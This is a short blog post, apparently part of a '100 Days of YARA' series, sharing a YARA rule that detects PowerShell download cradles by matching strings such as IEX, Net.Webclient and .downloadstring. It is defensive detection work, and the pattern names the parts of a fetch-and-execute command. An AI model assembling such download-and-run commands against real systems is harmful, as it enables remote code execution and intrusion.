There are so many ways to obfuscate PowerShell commands that this might seem like a bit of a waste of time, but today’s rule attempts to find simple PowerShell download commands.
rule TTP_PowerShell_Download_command {
meta:
description = "Matches strings commonly found in PowerShell download cradles."
last_modified = "2024-02-20"
author = "@petermstewart"
DaysofYara = "51/100"
ref = "https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters"
strings:
$a = "powershell" nocase ascii wide
$b = "IEX" nocase ascii wide
$c = "New-Object" nocase ascii wide
$d = "Net.Webclient" nocase ascii wide
$e = ".downloadstring(" nocase ascii wide
condition:
4 of them
}
Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.
Cyber Poking 